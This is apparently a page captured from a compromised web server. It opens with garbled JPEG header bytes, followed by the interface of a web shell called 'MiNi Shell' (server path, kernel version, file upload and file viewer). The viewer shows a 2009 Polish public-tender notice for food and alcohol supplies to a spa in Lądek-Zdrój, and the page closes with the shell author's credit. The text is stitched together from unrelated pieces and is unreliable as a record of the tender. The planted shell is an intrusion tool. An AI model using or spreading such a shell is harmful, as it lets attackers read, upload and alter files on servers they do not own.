JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090520/157160-N-2009.html

<p class="kh_header"><b>Lądek-Zdrój: Sukcesywne dostawy artykułów spożywczych - drobiu, mrożonek i napojów alkoholowych dla Uzdrowiska Lądek-Długopole SA.</b><br>
<b>Numer ogłoszenia: 157160 - 2009; data zamieszczenia: 20.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Lądek Długopole S.A. , ul. Wolności 4, 57-540 Lądek-Zdrój, woj. dolnośląskie, tel. 074 8146434, 8146227 w. 265, faks 074 8147107.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko-ladek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna Skarbu Państwa - NZOZ.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy artykułów spożywczych - drobiu, mrożonek i napojów alkoholowych dla Uzdrowiska Lądek-Długopole SA..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są : Sukcesywne dostawy artykułów spożywczych do części 1 -  drób tj. filet z piersi kurczaka - 4250 kg, filet z piersi indyka- 480 kg, porcje rosołowe - 9160 kg, udko kurczaka - 5820 kg, wątróbka drobiowa - 1620 kg, i żołądki drobiowe mrożone - 710 kg, szyjka z kurczaka - 100 kg, skrzydełka z kurczaka - 460 kg, kurczaki świeże - 15400 kg, kaczki - 800 kg, indyk - 150 kg, skrzydełka z kurczaka wędzone - 130 kg, udka z kurczaka wędzone - 400 kg, do części 2 mrożonki tj. brokuły mrożone - 2350 kg, brukselka mrożona - 1260 kg, ciasto mrożone - 270 kg, , fasolka szparagowa mrożona - 3200 kg, frytki mrożone - 175 kg, groszek mrożony - 320 kg, kalafior mrożony - 3300 kg, mrożonka kompotowa - 5500 kg, papryka mrożona - 730 kg, podgrzybki mrożone - 410 kg, rozetki ziem. - 300 kg, szpinak mrożony - 920 kg, zupa jarzynowa mrożona 1250 kg, włoszczyzna mrożona - 100 kg, marchew mini - 300 kg, do części 3 - napoje alkoholowe tj. wina białe gronowe - 40 szt., wino czerwone - 120 szt., rum - 46 szt., szampan - 331 szt., piwo - 100 szt., spirytus rektyfikowany - 20 szt., wódka - 400 szt., koniak - 20 szt., wino korzenne - 50 szt. dla Uzdrowiska Lądek-Długopole SA w Lądku Zdroju i Długopolu Zdroju zgodnie z załącznikami nr 1a do 1c do SIWZ ( formularzami cenowymi ), które zostały przygotowane w oparciu o faktyczne wykonanie w 2008r. i aktualne potrzeby Uzdrowiska. 
Zamawiający dopuszcza  składanie  ofert częściowych na jedną lub większą liczbę części wymienionych w zamówieniu.

Zakres całego zamówienia zawiera się w kwocie poniżej progów ustalonych na podstawie art. 11 ust. 8 Ustawy Pzp tj. poniżej 206 tys. euro. Zakres zamówienia dla części 1 i 2 zawiera się w kwocie pomiędzy 14 tys.euro a 206 tys. euro a dla części 3 w kwocie poniżej 14 tys. euro..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.11.00.00-2, 15.11.20.00-6, 15.30.00.00-1, 15.33.11.70-9, 15.91.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Ustala się wadium dla całości zamówienia w wysokości 5300.00 zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie  zamówienia mogą ubiegać się Wykonawcy, którzy:
- nie podlegają wykluczeniu na podstawie art.24 ustawy Pzp z dnia 29.01.2004r. z póź. zm.,
- spełniają warunki określone w art.22 ust.1,
- zaoferują:
a) wykonanie zamówienia w terminie:
dla części 1, 2, 3 - wg zał. nr 1a, 1b, 1c  - sukcesywnie od dnia podpisania umowy do dnia 06.06.2010r.
b) zaakceptują 21 dniowy termin płatności po otrzymaniu przez Zamawiającego faktury VAT  wystawionej na koniec każdego tygodnia,
c) przedłożą wymagane przez Zamawiającego dokumenty i oświadczenia,

Ocena spełnienia warunków udziału polegać będzie na kontroli autentyczności oraz kompletności i aktualności złożonych dokumentów, autentyczności  zawartych w nich informacji  oraz ocenie zawartych w dokumentach informacji pod kątem zgodności  z postawionymi warunkami w SIWZ - wszystko na zasadzie formuły: Spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca powinien dostarczyć następujące dokumenty i oświadczenia:
        1. Wypełniony i podpisany formularz ofertowy -  wg zał. nr 1 do SIWZ,
        2.  Wypełniony i podpisany formularz cenowy -  wg zał. nr 1a do 1c do SIWZ,
3. Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę i podmiotów występujących wspólnie /jeżeli dotyczy/,
4. Aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności    gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
5. Aktualne zezwolenie na sprzedaż hurtową napojów alkoholowych o zawartości do 4,5% alkoholu oraz piwa, zezwolenie na sprzedaż hurtową napojów alkoholowych powyżej 4,5% do 18% alkoholu z wyjątkiem piwa oraz zezwolenie na sprzedaż hurtową napojów alkoholowych o zawartości powyżej 18% alkoholu (dotyczy części 4 - zał. Nr 1d)
6. Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust. 1 i art. 24 Ustawy Pzp -  wg zał. nr 2  do SIWZ,
        7. Zaakceptują projekt umowy stanowiącej załącznik nr 3 do  niniejszej SIWZ,
8. Oświadczenie o nie zaleganiu w opłacie składek i podatków w US i ZUS, finansowe oraz o niekaralności -  wg zał. Nr 4 do SIWZ,
9.Wykaz  wykonanych  w okresie nie dłuższym niż ostatnie trzy lata dostaw, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (min. 1), odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz dokumentów (referencje) potwierdzających, że te dostawy zostały wykonane należycie  - wg zał. Nr 5 do SIWZ,
10.Oświadczenie Wykonawcy o wdrożeniu lub wdrażaniu zasad GMP ( dobra praktyka produkcyjna), GHP ( dobra praktyka higieniczna ) i  systemu HACCP w firmie.
11. Tylko do części 1 i 2    
a) zaświadczenie o posiadaniu specjalistycznego transportu do przewozu towaru wyszczególnionego w formularzach           cenowych - zał. Nr 1a i 1b..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko-ladek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Lądek-Długopole SA, ul. Wolności 4,  57-540 Lądek Zdrój, II piętro, pokój 203 ( Zamówienia Publiczne).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2009 godzina 10:00, miejsce: Uzdrowisko Lądek-Długopole SA, ul. Wolności 4,  57-540 Lądek Zdrój, I piętro, pokój nr 103 (Sekreatriat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com